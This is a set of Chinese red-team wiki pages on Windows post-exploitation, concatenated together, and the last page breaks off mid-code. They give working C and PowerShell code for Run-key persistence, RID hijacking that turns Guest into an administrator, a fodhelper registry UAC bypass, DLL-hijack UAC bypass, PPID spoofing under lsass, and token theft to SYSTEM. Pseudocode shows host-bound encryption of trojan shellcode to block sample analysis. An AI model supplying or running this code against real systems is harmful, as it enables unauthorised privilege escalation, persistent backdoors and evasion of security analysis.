  5 | 通常在获取到入口点之后我们需要快速收集当前主机的凭证，如chrome和navicat内存放的密码，如果能快速取得主机上安装的软件我们就能针对该软件进行密码的提取，本篇文章旨在解决这个问题。
  6 | 
  7 | ## 原理
  8 | 
  9 | 也没什么原理，主要是windows在安装软件的时候会注册一些注册表项，这些表项会存放着软件的相关信息。
 10 | 
 11 | 比如我们熟知的卸载功能：
 12 | 
 13 | ![](../.gitbook/assets/image%20%28163%29.png)
 14 | 
 15 | 具体定位到注册表则HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\*
 16 | 
 17 | ![](../.gitbook/assets/image%20%28159%29.png)
 18 | 
 19 | 与之相似的还有WMI class。
 20 | 
 21 | 注册表则是HKEY\_LOCAL\_MACHINE\SOFTWARE\Classes\Installer\Products\\*
 22 | 
 23 | ![](../.gitbook/assets/image%20%28160%29.png)
 24 | 
 25 | 我们可以通过读取注册表子项的键值对来进行快速的确认，投入实战的话需要对系统进行判断，如果是x64位系统则需要对32位程序也进行遍历。（x64系统存在注册表重定位）
 26 | 
 27 | ![](../.gitbook/assets/image%20%28161%29.png)
 28 | 
 29 | 当然这种方式仅对完整安装的软件有效，如果是绿色版的软件则只能通过手工或自动化搜索的方式查找。
 30 | 
 31 | ## 代码
 32 | 
 33 | ```text
 34 | 
 35 | #include <stdio.h>
 36 | #include <Windows.h>
 37 | #include <tchar.h>
 38 | 
 39 | 
 40 | BOOL EnumInstalledSoft(TCHAR* subKey, TCHAR* subKeyName) {
 41 | 
 42 | 	HKEY hKey = NULL;
 43 | 	HKEY hSubKey = NULL;
 44 | 	DWORD dwIndexs = 0;
 45 | 	TCHAR keyName[MAX_PATH] = { 0 };
 46 | 	DWORD dwLength = 256;
 47 | 	TCHAR subKeyValue[MAX_PATH] = { 0 };
 48 | 
 49 | 
 50 | 	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subKey, 0, KEY_READ, &hKey) == ERROR_SUCCESS)
 51 | 	{
 52 | 		while (RegEnumKeyEx(hKey, dwIndexs, keyName, &dwLength, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
 53 | 		{
 54 | 			RegOpenKey(hKey, keyName, &hSubKey);
 55 | 
 56 | 			RegQueryValueEx(hSubKey,
 57 | 				subKeyName,
 58 | 				NULL,
 59 | 				NULL,
 60 | 				(LPBYTE)subKeyValue,
 61 | 				&dwLength);
 62 | 
 63 | 			printf("%s : %s  \n", keyName, subKeyValue);
 64 | 			RegCloseKey(hSubKey);
 65 | 			hSubKey = 0;
 66 | 			++dwIndexs;
 67 | 			dwLength = 256;
 68 | 		}
 69 | 	}
 70 | 	else
 71 | 	{
 72 | 		return FALSE;
 73 | 	}
 74 | 	if (hKey != NULL)
 75 | 	{
 76 | 		RegCloseKey(hKey);
 77 | 		return TRUE;
 78 | 	}
 79 | }
 80 | 
 81 | int main()
 82 | {
 83 | 
 84 | 
 85 | 	EnumInstalledSoft((TCHAR*)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",(TCHAR*)"DisplayName");
 86 | 	EnumInstalledSoft((TCHAR*)"Software\\Classes\\Installer\\Products", (TCHAR*)"ProductName");
 87 | 	system("pause");
 88 | 
 89 | 
 90 | 	return 0;
 91 | }
 92 | 
 93 | ```
 94 | 
 95 | ![](../.gitbook/assets/image%20%28162%29.png)
 96 | 
 97 | ## LINKS
 98 | 
 99 | {% embed url="https://docs.microsoft.com/zh-cn/?view=vs-2019" %}
100 | 
101 | 
102 | 
103 | 


--------------------------------------------------------------------------------
/persistence/registry-startup.md:
--------------------------------------------------------------------------------
 1 | # 注册表自启动项
 2 | 
 3 | ## 简介
 4 | 
 5 | 为了便于使用，操作系统通常会提供开机自启动功能，这样能方便用户不用人为的去运行程序就能自己运行起来，由于开机自启动的特殊性，此类功能也往往是红蓝对抗重点博弈的地方。
 6 | 
 7 | 本文将介绍如通过注册表项实现病毒木马自启动。
 8 | 
 9 | ## 流程
10 | 
11 | 1. 打开自启动键
12 | 2. 写入自启动键
13 | 
14 | 由于windows提供了专门的开机启动注册表项，每次开机操作系统都会遍历这个注册表项下的键值对，获取并创建进程，所以我们只需要添加这个注册表项就能实现自启动。
15 | 
16 | 这里给出两个表项，他们的最主要的区别就是主键写入权限的不同。
17 | 
18 | PS：32位程序往64位注册表内写入数据时会发生重定位。
19 | 
20 | ```text
21 | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
22 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
23 | ```
24 | 
25 | ## 代码实现
26 | 
27 | 由于通过cmd添加键值的方式已被众所周知，这里只给出c实现的代码。
28 | 
29 | ```text
30 | 
31 | 
32 | #include <Windows.h>
33 | #include <stdio.h>
34 | 
35 | BOOL SetKeyValue(PCHAR lpszFileName, PCHAR lpszKeyValue,CHAR cType) {
36 | 	HKEY hKey=NULL;
37 | 	PCHAR KeyAddr=NULL;
38 | 	switch (cType)
39 | 	{
40 | 	case 1:
41 | 		KeyAddr = (PCHAR)"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run";
42 | 		break;
43 | 	case 2:
44 | 		KeyAddr = (PCHAR)"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
45 | 		break;
46 | 	case 3:
47 | 		break;
48 | 
49 | 	}
50 | 
51 | 	if (ERROR_SUCCESS!=RegOpenKeyEx(HKEY_CURRENT_USER,KeyAddr,0,KEY_WRITE,&hKey))
52 | 	{
53 | 		return FALSE;
54 | 	}
55 | 	if (ERROR_SUCCESS!= RegSetValueEx(hKey,lpszKeyValue,0,REG_SZ,(PBYTE)lpszFileName,1+strlen(lpszFileName)))
56 | 	{
57 | 		RegCloseKey(hKey);
58 | 		return FALSE;
59 | 	}
60 | 	RegCloseKey(hKey);
61 | }
62 | 
63 | int  main()
64 | {	
65 | 	if (FALSE == SetKeyValue((PCHAR)"C:\\Windows\\System32\\cmd.exe", (PCHAR)"cmd",1))
66 | 	{
67 | 		printf("ok");
68 | 	}
69 | 	return 0;
70 | }
71 | 
72 | ```
73 | 
74 | ## LINKS
75 | 
76 | {% embed url="https://docs.microsoft.com/zh-cn/?view=vs-2019" %}
77 | 
78 | 


--------------------------------------------------------------------------------
/persistence/rid-hijack.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | description: RID-hijack
 3 | ---
 4 | 
 5 | # RID劫持
 6 | 
 7 | ## RID Hijack简介
 8 | 
 9 | 在windows系统内，使用rid区分用户组和用户账户，rid是安全标识符sid的一部分，每创建一个组或一个用户，都会往后递增一位，通常administrator的rid始终为500，而标准用户通常以1001开始。
10 | 
11 | ![](../.gitbook/assets/image%20%2839%29.png)
12 | 
13 |  [Sebastian Castr](https://twitter.com/r4wd3r)发现可以通过修改注册表来劫持有效账户的RID，使guest成为管理员，同时进行活动的话会以原本的身份记录在日志内。
14 | 
15 | ## 手工操作
16 | 
17 | windows内置访客账户guest的rid信息储存在一下键值对内。
18 | 
19 | ```text
20 | HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
21 | ```
22 | 
23 | ![0x1f5&#x8F6C;&#x6362;&#x6210;&#x5341;&#x8FDB;&#x5236;501](../.gitbook/assets/image%20%2827%29.png)
24 | 
25 | 也可以通过wmic查询。
26 | 
27 | ```text
28 | wmic useraccount where (name='Guest') get name,sid
29 | ```
30 | 
31 | ![](../.gitbook/assets/image%20%2833%29.png)
32 | 
33 | 通过RID在如下键值对内寻找账户的相关信息。
34 | 
35 | ```text
36 | HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
37 | ```
38 | 
39 | 找到如下注册表项的键值对“F",此键值对内存储着标识账户RID和是否开启的数值。
40 | 
41 | PS:需要system权限。
42 | 
43 | ![](../.gitbook/assets/image%20%2878%29.png)
44 | 
45 | 在"F"键值对偏移0x30的位置存储着RID，修改为0xF401\(500\)即可劫持RID。
46 | 
47 | 偏移0x38确定账户是否启用\(0X1502-&gt;关闭,0x1402-&gt;启用\)。
48 | 
49 | 更改这些值将启用启用来宾帐户（有时情况下一部分），并劫持提升的RID（本地管理员）。来宾帐户将具有管理员权限，但是该帐户仍然不会出现在本地管理员组中。
50 | 
51 | ## 代码实现
52 | 
53 | 由于powershell和bat的脚本在互联网上可以轻易找到，这里只给出c的版本。
54 | 
55 | 在metasploit和empire内也有比较成熟的模块。
56 | 
57 | ```text
58 | #include <Windows.h>
59 | #include <stdio.h>
60 | 
61 | 
62 | int  main()
63 | {
64 | 	HKEY hKey = NULL;
65 | 	PCHAR KeyAddr = NULL;
66 | 	DWORD KeySize;
67 | 	DWORD KeyType;
68 | 	BYTE Buffer[0x50] = { 0 };
69 | 	KeyAddr = (PCHAR)"SAM\\SAM\\Domains\\Account\\Users\\000001F5";
70 | 
71 | 	RegOpenKeyExA(HKEY_LOCAL_MACHINE, KeyAddr, 0, KEY_ALL_ACCESS, &hKey);
72 | 	RegQueryValueExA(hKey, "F", NULL, &KeyType, (LPBYTE)&Buffer, &KeySize);
73 | 
74 | 	Buffer[0x30] = (BYTE)0xf4; //hijack rid
75 | 	Buffer[0x38] = (BYTE)0x14; //enable guest
76 | 	
77 | 	RegSetValueExA(hKey, "F",NULL, KeyType, Buffer, KeySize);
78 | 	RegCloseKey(hKey);
79 | 	return 0;
80 | }
81 | 
82 | ```
83 | 
84 | ## LINKS
85 | 
86 | {% embed url="https://pentestlab.blog/category/red-team/persistence/page/1/" %}
87 | 
88 | {% embed url="https://xz.aliyun.com/t/2998" %}
89 | 
90 | 
91 | 
92 | 


--------------------------------------------------------------------------------
/persistence/simple-cc.md:
--------------------------------------------------------------------------------
 1 | # 编写简单远控
 2 | 
 3 | ## 简介
 4 | 
 5 | 通常在使用cmd控制台中执行命令，本质上是执行windows目录下的system32&syswow64内的可执行文件，通常此类操作可以通过winexec，system等函数进行模拟cmd下命令的执行，但是此类命令往往没有回显，这对我们查看命令执行结果造成一些麻烦。
 6 | 
 7 | 好在windows提供了一种在进程间共享数据的机制，我们称其为管道\(pipe\)，在windows中其实质是一段共享内存，windows为这段内存设计使用数据流I/O的方式来进行访问。
 8 | 
 9 | 管道具体又分为匿名管道和命名管道，匿名管道只能用于父子进程之间的数据通信，不能在网络中通信，同时数据传输时单项的，只能一端读，一端写。命名管道则可以在任意进程和网络间通信，且数据是双向的，但同一时间只能一端读一端写。
10 | 
11 | 在windows操作系统提供的createprocess函数可以可以指定程序运行结果存储的缓冲区，如果我们把这个缓冲区指定成匿名管道的写入端，那么我们就能在父进程内进行对执行结果的读取。
12 | 
13 | ## 流程
14 | 
15 | 1. 创建匿名管道
16 | 2. 创建STARTUPINFO结构体
17 | 3. 创建进程
18 | 4. 等待执行结束
19 | 5. 读取缓冲区
20 | 
21 | ## 代码实现
22 | 
23 | ```text
24 | #include<Windows.h>
25 | #include<stdio.h>
26 | 
27 | int main() {
28 | 
29 | 	SECURITY_ATTRIBUTES se = { 0 };
30 | 	se.bInheritHandle = TRUE;//描述的对象可以被继承
31 | 	se.nLength = sizeof(se);
32 | 	se.lpSecurityDescriptor = NULL;
33 | 
34 | 
35 | 	HANDLE hWPipe=NULL;
36 | 	HANDLE hRPipe=NULL;
37 | 
38 | 	CreatePipe(&hRPipe, &hWPipe, &se, NULL);
39 | 
40 | 
41 | 	STARTUPINFOA si = { 0 };
42 | 	si.cb = sizeof(si);
43 | 	si.hStdError = hWPipe;
44 | 	si.hStdOutput = hWPipe;
45 | 	si.wShowWindow = SW_HIDE;//隐藏窗口
46 | 
47 | 	si.dwFlags = STARTF_USESHOWWINDOW //启用wShowWindow成员
48 | 			   | STARTF_USESTDHANDLES;//启用hStdOutput，hStdError和hStdInput成员
49 | 
50 | 	PROCESS_INFORMATION pi = { 0 };
51 | 
52 | 	CreateProcessA(NULL, (LPSTR)"systeminfo", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
53 | 	
54 | 	WaitForSingleObject(pi.hProcess, INFINITE);
55 | 	WaitForSingleObject(pi.hThread,INFINITE);
56 | 
57 | 	LPVOID lpBuffer[4096] = { 0 };
58 | 
59 | 	ReadFile(hRPipe, lpBuffer, 4096, NULL, NULL);
60 | 
61 | 
62 | 	printf("%s", lpBuffer);
63 | 
64 | 	CloseHandle(pi.hProcess);
65 | 	CloseHandle(pi.hThread);
66 | 	CloseHandle(hWPipe);
67 | 	CloseHandle(hRPipe);
68 | 
69 | 	return 0;
70 | 
71 | }
72 | ```
73 | 
74 | ![](../.gitbook/assets/image%20%2871%29.png)
75 | 
76 | ## LINKS
77 | 
78 | {% embed url="https://docs.microsoft.com/zh-cn/?view=vs-2019" %}
79 | 
80 | 
81 | 
82 | 


--------------------------------------------------------------------------------
/persistence/zhu-ji-te-zheng-bang-ding-mu-ma.md:
--------------------------------------------------------------------------------
 1 | # 主机特征绑定木马
 2 | 
 3 | ## 简介
 4 | 
 5 | 我们在搞下一台机器的时候需要留下一个后门作为下次造访的通道，那么这个后门能存活多久同时不被发现就是我们首要解决的问题，借鉴以往同行的经验，通常我们可以使用一些反沙箱与反调试的功能来保障木马的存货，但这也只是缓兵之计，只要我们定制的木马体作为样本被上传到云端，那么这个马距离全球联保的时间也不远了，那么我们有没有一种方法可以保障我们的木马无法被分析呢。
 6 | 
 7 | 由于是出于驻留目的编写的木马，所以不用考虑泛用性。
 8 | 
 9 | 本文提出两种思路，第一种思路是使木马无法脱离当前环境执行，第二种对抗杀软使其无法上传样本。
10 | 
11 | ## 思路
12 | 
13 | ### 1.主机绑定
14 | 
15 | 1. 使用主机特征加密实际木马体。
16 | 2. 读取Machine id\(也可使用其他主机特征\)加密木马体\(如shellcode\)
17 | 3. 使用读取到的machineid加密shellcode
18 | 4. 编写读取当前主机machineid并尝试解密执行的木马
19 | 
20 | ### 2.执行分离
21 | 
22 | 1. 将木马体写在无法上传的位置
23 | 2. 编写定制执行器
24 | 
25 | ## 伪代码
26 | 
27 | windows会在安装后生成一个product ID\(可以使用主板序号、cpu编号、用户名等主机特征\)该值理论上唯一，我们可以读取这个值作为密钥加密我们的木马体，然后编写读取当前环境值的加载器。  
28 | 
29 | ![](../.gitbook/assets/image%20%28286%29.png)
30 | 
31 | 这个就写伪代码了。
32 | 
33 | 加密部分
34 | 
35 | ```text
36 | shellcode="XXXX"
37 | key = read('xxx')
38 | def encode(key,shellcode){
39 |     自有算法处理shellcode
40 |     return encode_shellcode
41 |     }
42 | print encode(key,shellcode)
43 | ```
44 | 
45 | 解密部分
46 | 
47 | ```text
48 | encode_shellcode="xxxx"
49 | key = read('xxx')
50 | def decode(key,encode_shellcode){
51 |     自有算法解密shellcode
52 |     return shellcode
53 | }
54 | shellcode=decode(key,shellcode)
55 | shellcode()
56 | ```
57 | 
58 | 


--------------------------------------------------------------------------------
/privilege-escalation/bypassuac-fodhelper.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | description: bypassuac-Fodhelper
  3 | ---
  4 | 
  5 | # 基于注册表劫持BypassUAC
  6 | 
  7 | ## what is UAC？
  8 | 
  9 | UAC 是微软在 Windows Vista 以后版本引入的一种安全机制， UAC全称是User Account Control直译为“用户帐户控制”，是微软为提高系统安全而在Windows Vista中引入的新技术，VISTA以后的微软系统中都带有这个功能，如WIN7和WIN8系统中都有，UAC需要用户在执行一些可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前，提供权限或管理员‌密码。
 10 | 
 11 | ## UAC的作用
 12 | 
 13 | 通过 UAC，应用程序和任务可始终在非管理员帐户的安全上下文中运行，除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装，并防止无意中更改系统设置。
 14 | 
 15 | * 流程如下: 
 16 | 
 17 | ![](../.gitbook/assets/uacflowchart.png)
 18 | 
 19 | ## UAC的实现
 20 | 
 21 | Windows操作系统中所有资源都有一个ACL\(Access Control List\)标识了拥有什么权限的用户/进程能够访问这个资源。 在开启了 UAC 之后，如果用户以管理员权限登陆，会生成两份访问令牌，一份是完整的管理员访问令牌（Full Access Token），一份是标准用户令牌\(Access Token\)。一般情况下会以标准用户权限启动 Explorer.exe 进程。在需要使用高完整性令牌时，会提示询问用户，如果用户同意，则继续进行操作。
 22 | 
 23 | ## what is BypassUAC?
 24 | 
 25 | 在触发UAC时，操作系统会创建一个名为consent.exe的进程，该进程通过白名单和用户选择来确定是否提升权限。 请求进程将要提升权限的进程的commandline和程序路径通过LPC\(Local Procedure Call\)接口传递给appinfo的RAiluanchAdminProcess函数，该函数首先会验证传入程序是否在白名单内同时判断是否弹出UAC窗口，这个UAC框会创建新的安全桌面，屏蔽之前的界面。同时这个UAC框进程是SYSTEM权限进程，其他普通进程也无法和其进行通信交互。用户确认之后，会调用CreateProcessAsUser函数以管理员权限启动请求的进程。 通常通过UAC的权限提升需要由用户确认，在不被用户发现的情况下静默的将程序的普通权限提升为管理员权限，从而使程序可以实现一些需要权限的操作被称之为BypassUac。
 26 | 
 27 | ## 基于白名单的BypassUac
 28 | 
 29 | 有一些系统程序是会直接获取管理员权限同时不出发UAC弹窗的，这类程序被称为白名单程序。 这些程序拥有一个manifest文件该文件本质上是一个XML文件用于标识该程序的配置属性。 拥有autoElevate属性程序和微软签名和白名单会被操作系统认为是可信的。会在启动时就静默提升权限。
 30 | 
 31 | ## BypassUac实例分析-fodhelper.exe
 32 | 
 33 | * 实验环境:
 34 | 
 35 | ![](../.gitbook/assets/windows-version.png)
 36 | 
 37 | 
 38 | 
 39 | 使用微软官方提供的sigcheck工具可以检查程序的manifest标识的配置属性，可用于检查是否拥有autoElevate属性。
 40 | 
 41 | * 检查程序属性:
 42 | 
 43 | ![](../.gitbook/assets/autoelevate.png)
 44 | 
 45 | 
 46 | 
 47 | 使用微软提供的procmon工具可以监控程序进行的注册表和文件操作。
 48 | 
 49 | * 使用过滤规则:
 50 | 
 51 | ![](../.gitbook/assets/filter.png)
 52 | 
 53 | 使用procmon监控fodhelper的行为数据发现，在启动过程中会查询注册表项HKCU:\Software\Classes\ms-settings\Shell\Open\command，发现路径不存在后继续查询，通常已shell\open\command命名的键值对存储的是可执行文件的路径，如果我们能写入这个键值对，那么在程序启动过程中我们会得到一个已高权限执行的可执行文件，由于该键值对属于HKCU，所以即使是普通用户也能编辑该键值对，那么现在我们就可以已高权限静默执行任意指定文件。
 54 | 
 55 | * 具体过程:
 56 | 
 57 | ![](../.gitbook/assets/processs-mon.png)
 58 | 
 59 | 如果键值对HKCU:\Software\Classes\ms-settings\shell\open\command存在，fodhelper会查找HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute,若也存在到则读取HKCU:\Software\Classes\ms-settings\shell\open\command的值然后执行。
 60 | 
 61 | * 存在DelegateExecute:
 62 | 
 63 | ![](../.gitbook/assets/delegateexecute.jpg)
 64 | 
 65 | * \shell\open\command存在值: 
 66 | 
 67 | ![](../.gitbook/assets/opencmd.jpg)
 68 | 
 69 | * 编码实现: [https://github.com/supersalted/FodhelperBypassUAC](https://github.com/supersalted/FodhelperBypassUAC)
 70 | * powershell版本:
 71 | 
 72 |   ```text
 73 |   [String]$program = "cmd /c start powershell.exe"
 74 |   New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
 75 |   New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
 76 |   Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
 77 |   Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
 78 |   Start-Sleep 3
 79 |   Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
 80 |   ```
 81 | 
 82 | * c++版本:
 83 | 
 84 | ```text
 85 | #include <windows.h>
 86 | #include <stdio.h>
 87 | #pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup")
 88 | 
 89 | int main(int argc, char* argv[]) {
 90 |     PROCESS_INFORMATION pi = { 0 };
 91 |     STARTUPINFOA si = { 0 };
 92 |     HKEY hKey;
 93 | 
 94 |     si.cb = sizeof(STARTUPINFO);
 95 |     si.wShowWindow = SW_HIDE;
 96 |     RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\open\\command", &hKey);
 97 |     RegSetValueExA(hKey, "", 0, REG_SZ, (LPBYTE)"cmd.exe", strlen("cmd.exe"));
 98 |     RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (LPBYTE)"", sizeof(""));
 99 |     CreateProcessA("C:\\Windows\\System32\\cmd.exe",(LPSTR)"/c C:\\Windows\\System32\\fodhelper.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi);
100 |     Sleep(5000);
101 |     RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings");
102 | 
103 |     return 0;
104 | }
105 | ```
106 | 
107 | * 实现效果:
108 | 
109 | ![](../.gitbook/assets/powershell.png)
110 | 
111 | ## LINKS
112 | 
113 | {% embed url="https://payloads.online/" %}
114 | 
115 | {% embed url="https://www.cnblogs.com/Chesky/p/UAC\_Bypass.html" %}
116 | 
117 | {% embed url="https://docs.microsoft.com/en-us/cpp/security/how-user-account-control-uac-affects-your-application?redirectedfrom=MSDN&view=vs-2019" %}
118 | 
119 | 《windows黑客编程技术详解》 
120 | 
121 | 《windows核心编程第五版》
122 | 
123 | 


--------------------------------------------------------------------------------
/privilege-escalation/dll-hijack-bypassuac.md:
--------------------------------------------------------------------------------
 1 | # 基于dll劫持BypassUac
 2 | 
 3 | ## dll劫持
 4 | 
 5 | > 由于输入表中只包含DLL名而没有它的路径名，因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL，如果没找到，则在Windows系统目录中查找，最后是在环境变量中列出的各个目录下查找。利用这个特点，先伪造一个系统同名的DLL，提供同样的输出表，每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL，完成相关功能后，再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持（hijack）了。
 6 | 
 7 | 参考-&gt;
 8 | 
 9 | {% page-ref page="../persistence/dll-hijack.md" %}
10 | 
11 | ## 利用流程
12 | 
13 | 1. 寻找一个带有autoElevate属性又具有dll劫持缺陷的程序
14 | 2. 确定可劫持dll
15 | 3. 写入恶意dll
16 | 
17 | ## dll劫持bypassuac实验
18 | 
19 | 我们知道在进程创建的时候会复制一份登录用户的主令牌，而令牌内包含的特权又标识着当前进程的权限，部分拥有微软签名又具有autoElevate属性的程序会静默提升权限，本质上是把一个受限的令牌替换成一个高完整性的令牌，同时我们又知道在程序载入dll后在某些情况下程序会自动执行dllmain，如果我们能劫持一个dll，那我们编写的dll也会以拥有高完整性令牌的权限执行。
20 | 
21 | 如何寻找带有autoElevate参考-&gt;
22 | 
23 | {% page-ref page="bypassuac-fodhelper.md" %}
24 | 
25 | * 寻找一个带有autoElevate属性又具有dll劫持缺陷的程序
26 | 
27 | 过滤条件:
28 | 
29 | ![](../.gitbook/assets/image%20%2860%29.png)
30 | 
31 | ![](../.gitbook/assets/image%20%2819%29.png)
32 | 
33 | 运行自动提权文件我们发现，在程序当前目录并不存在预期dll，虽然处于system32目录下我们无法直接写入dll，但是操作系统提供的一些功能是可以让我们以受限用户权限越权写入的，如wusa能够将cab文件释放至管理员权限的文件夹，在之后的windows10中虽然取消了该方法，但是同样有等效的替代方案IFileOperation越权复制文件。
34 | 
35 | 在这里笔者就直接把dll放入system32\sysprep\。\(好吧其实是我懒\)。
36 | 
37 | ![](../.gitbook/assets/image%20%2831%29.png)
38 | 
39 | 成功bypassuac，当然如果要武器化,那还需要对dll进行一些优化。
40 | 
41 | ## LINKS
42 | 
43 | {% embed url="https://github.com/hfiref0x/UACME" %}
44 | 
45 | 
46 | 
47 | 


--------------------------------------------------------------------------------
/privilege-escalation/privilege-escalation-ppid.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | description: PPID-Priv
 3 | ---
 4 | 
 5 | # 通过伪装PPID提权到SYSTEM
 6 | 
 7 | ## 简介
 8 | 
 9 | 在指定父进程句柄的时候,子进程同时也会继承父进程的权限，这样的话我们也可以通过伪装PPID的方式进行提权，但是这样的技术会有一个较大的缺陷，如果使用process explorer等进程监控软件查看的话会显示在系统权限的进程下派生出了一个子进程，这样会有较大的特征,更容易会被发现，当然也可以通过其他技术手段进行为伪装。
10 | 
11 | ps:需要管理员权限
12 | 
13 | ## 代码实现
14 | 
15 | ```text
16 |         STARTUPINFOEX sie = { sizeof(sie) };
17 |         PROCESS_INFORMATION pi;
18 |         SIZE_T cbAttributeListSize = 0;
19 |         PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL;
20 |         HANDLE hParentProcess = NULL;
21 |         DWORD dwPid = 0;
22 | 
23 |         dwPid = FindProcessPID(L"lsass.exe");
24 | 
25 |             InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize);
26 |             pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, cbAttributeListSize);
27 |             InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);
28 |             hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
29 |             UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL);
30 | 
31 |             sie.lpAttributeList = pAttributeList;
32 |             CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (LPSTARTUPINFOA)&sie.StartupInfo, &pi);
33 | 
34 |             DeleteProcThreadAttributeList(pAttributeList);
35 |             CloseHandle(hParentProcess);
36 | ```
37 | 
38 | ![](../.gitbook/assets/image%20%2846%29.png)
39 | 
40 | ## LINKS
41 | 
42 | {% embed url="https://docs.microsoft.com/zh-cn/windows/win32/api" %}
43 | 
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/privilege-escalation/privilege-escalation-service.md:
--------------------------------------------------------------------------------
 1 | # 通过系统服务提权到SYSTEM
 2 | 
 3 | ## 简介
 4 | 
 5 | 代码延用[自启动服务](../persistence/startup-service.md)，由于服务工作在system用户，天生具有很高权限，所以当我们可以控制创建修改进程时，就能轻易的从administrator权限提升到system权限。
 6 | 
 7 | ## 实现效果
 8 | 
 9 | ![](../.gitbook/assets/image%20%2812%29.png)
10 | 
11 | 


--------------------------------------------------------------------------------
/privilege-escalation/token-manipulation.md:
--------------------------------------------------------------------------------
  1 | # 通过复制Token提权到SYSTEM
  2 | 
  3 | 在windows系统中使用一个较高细粒度的Token来区分和管理权限，我们通常说的system权限administrator权限本质上是令牌的完整性和特权不同，通过细粒度较高的特权进行区分。
  4 | 
  5 | 在本文中，不会对令牌机制进行详细的剖析，只需要知道它本质上是一个内核对象即可，详细的内容会在以后的内核操作文章中详细讲解。
  6 | 
  7 | * 下图分别是medium完整性令牌和high完整性令牌。
  8 | 
  9 | ![](../.gitbook/assets/image%20%2811%29.png)
 10 | 
 11 | ![](../.gitbook/assets/image%20%2838%29.png)
 12 | 
 13 | ## 提权流程
 14 | 
 15 | 1. 打开system权限进程
 16 | 2. 复制system权限进程Token
 17 | 3. 使用复制Token打开新进程
 18 | 
 19 | ## 代码实现
 20 | 
 21 | 默认配置的管理员拥有SeDebugPrivilege，该权限用于调试进程，是否拥有直接决定你是否能打开写入调试注入如winlogon,system等进程。
 22 | 
 23 | ```text
 24 | #include <windows.h>
 25 | #include <iostream>
 26 | #include <Lmcons.h>
 27 | #include <TlHelp32.h>
 28 | 
 29 | BOOL SePrivTokenrivilege(
 30 | 	HANDLE hToken,          
 31 | 	LPCTSTR lpszPrivilege, 
 32 | 	BOOL bEnablePrivilege  
 33 | )
 34 | {
 35 | 	LUID luid;
 36 | 
 37 | 	if (!LookupPrivilegeValue(
 38 | 		NULL,            
 39 | 		lpszPrivilege,  
 40 | 		&luid))       
 41 | 	{
 42 | 		return FALSE;
 43 | 	}
 44 | 
 45 | 	TOKEN_PRIVILEGES PrivToken;
 46 | 	PrivToken.PrivilegeCount = 1;
 47 | 	PrivToken.Privileges[0].Luid = luid;
 48 | 	if (bEnablePrivilege)
 49 | 		PrivToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 50 | 	else
 51 | 		PrivToken.Privileges[0].Attributes = 0;
 52 | 
 53 | 
 54 | 	if (!AdjustTokenPrivileges(
 55 | 		hToken,
 56 | 		FALSE,
 57 | 		&PrivToken,
 58 | 		sizeof(TOKEN_PRIVILEGES),
 59 | 		(PTOKEN_PRIVILEGES)NULL,
 60 | 		(PDWORD)NULL))
 61 | 	{
 62 | 		return FALSE;
 63 | 	}
 64 | 
 65 | 	return TRUE;
 66 | }
 67 | 
 68 | 
 69 | DWORD FindProcessPID(const wchar_t* ProcessName) {
 70 | 	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 71 | 	PROCESSENTRY32 process = { 0 };
 72 | 	process.dwSize = sizeof(process);
 73 | 
 74 | 	if (Process32First(snapshot, &process)) {
 75 | 		do {
 76 | 			if (!wcscmp((const wchar_t*)process.szExeFile,(const wchar_t*)ProcessName))
 77 | 				break;
 78 | 		} while (Process32Next(snapshot, &process));
 79 | 	}
 80 | 
 81 | 	CloseHandle(snapshot);
 82 | 	return process.th32ProcessID;
 83 | }
 84 | 
 85 | int main(int argc, char** argv) {
 86 | 	HANDLE hDpToken = NULL;
 87 | 	
 88 | 	
 89 | 
 90 | 	HANDLE hCurrentToken = NULL;
